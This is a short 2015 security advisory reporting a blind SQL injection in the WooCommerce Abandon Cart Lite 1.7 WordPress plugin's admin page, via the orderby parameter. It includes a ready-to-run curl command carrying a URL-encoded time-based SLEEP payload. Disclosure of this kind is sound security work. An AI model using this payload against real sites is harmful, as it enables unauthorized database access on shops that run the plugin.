Subject: Blind SQL injection in WooCommerce Abandon Cart Lite Plugin 1.7
Date: Wed, 15 Jul 2015 19:12:04 +0200

Hello,

Plugin: WooCommerce Abandon Cart Lite Plugin 1.7 https://wordpress.org/plugins/woocommerce-abandoned-cart/

Authenticated users with "manage_woocommerce" role can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (woocommerce_abandon_cart::woocommerce_ac_page())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=woocommerce_ac_page&orderby=[sqli]
Vulnerable parameters: orderby, order(?)

Example PHP callstack:
woocommerce_abandon_cart::woocommerce_ac_page   [/woocommerce-abandoned-cart/woocommerce-ac.php:847]
wpdb::get_results

Verification:
curl --cookie "..." "http://localhost/wp-admin/admin.php?page=woocommerce_ac_page&orderby=%60%2C%28SELECT+%2A+FROM+%28SELECT+SLEEP%285%29%29X%29%3B--+-"

-- 
Regards,
Marcin Probola,